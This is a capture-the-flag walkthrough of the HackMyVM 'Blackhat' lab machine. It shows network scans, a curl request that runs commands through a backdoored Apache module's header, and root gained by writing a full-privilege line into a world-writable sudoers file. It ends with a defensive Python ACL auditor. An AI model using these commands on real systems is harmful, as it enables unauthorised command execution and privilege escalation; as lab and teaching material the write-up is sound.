HackmyVM-Blackhat


Information gathering

Scan the local network with arp-scan -l:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:73:b2:7a PCS Systemtechnik GmbH
192.168.31.140 08:00:27:19:a9:32 PCS Systemtechnik GmbH

192.168.31.140 is the target machine's address.

Next, scan its ports:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.140
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 00:16 EDT
Nmap scan report for 192.168.31.140
Host is up (0.0019s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:19:A9:32 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds

Only port 80 is open. A directory scan turns up a phpinfo.php page, which lists the loaded Apache modules:

Loaded Modules	core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_backdoor mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php7 mod_reqtimeout mod_setenvif mod_status

mod_backdoor is vulnerable: the value of a Backdoor request header is run as a command.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.140 -H "Backdoor: id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Get a reverse shell, upload linpeas.sh, run it, and look at the results:

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
# file: /etc/sudoers
USER root r--
user darkdante rw-
GROUP root r--
mask rw-
other ---

The ACL shows that darkdante has write permission on the sudoers file, and a plain su to darkdante just logs in directly, hahaha.

Write the following line into the sudoers file:

darkdante ALL=(ALL:ALL) ALL

Then run sudo su, and the privilege escalation succeeds.
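
From the defender's side, the finding above is a named-user ACL entry with write access on /etc/sudoers. The following added example (not part of the original write-up) parses getfacl tabular output in the layout linpeas printed and flags such entries; the watch list and the sample text are constructed assumptions.

```python
# Audit getfacl tabular output (getfacl -t) for ACL writes on sensitive files.
SENSITIVE = {"/etc/sudoers", "/etc/passwd", "/etc/shadow"}  # assumed watch list
# Constructed sample: the finding from this box plus one clean file.
SAMPLE = """\
# file: /etc/sudoers
USER root r--
user darkdante rw-
GROUP root r--
mask rw-
other ---

# file: /etc/passwd
USER root rw-
GROUP root r--
other r--
"""

def parse_tabular(text):
    """Return {path: [(tag, qualifier, perms), ...]} for regular files."""
    acls, current = {}, None
    for line in text.splitlines():
        parts = line.split()
        if line.startswith("# file:"):
            current = line.split(":", 1)[1].strip()
            acls[current] = []
        elif parts and not line.startswith("#") and current is not None:
            # "mask" and "other" have no qualifier column.
            qualifier = parts[1] if len(parts) == 3 else ""
            acls[current].append((parts[0], qualifier, parts[-1]))
    return acls

def risky_writers(text, sensitive=SENSITIVE):
    """List (path, tag, qualifier) with effective write on a sensitive file."""
    findings = []
    for path, entries in parse_tabular(text).items():
        if path not in sensitive:
            continue
        mask = next((p for t, _, p in entries if t == "mask"), "rwx")
        for tag, qualifier, perms in entries:
            # Lowercase user/group are named entries (uppercase = owner and
            # owning group); the mask caps what a named entry really gets.
            named = tag in ("user", "group") and "w" in perms and "w" in mask
            if named or (tag == "other" and "w" in perms):
                findings.append((path, tag, qualifier))
    return findings

if __name__ == "__main__":
    for path, tag, qualifier in risky_writers(SAMPLE):
        print(f"{path}: {tag} {qualifier or '-'} has write access")
```

On a live host the input would come from running getfacl -t with absolute path names against the watched files; any finding on /etc/sudoers should be removed with setfacl and the file's mode restored to root-owned read-only.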
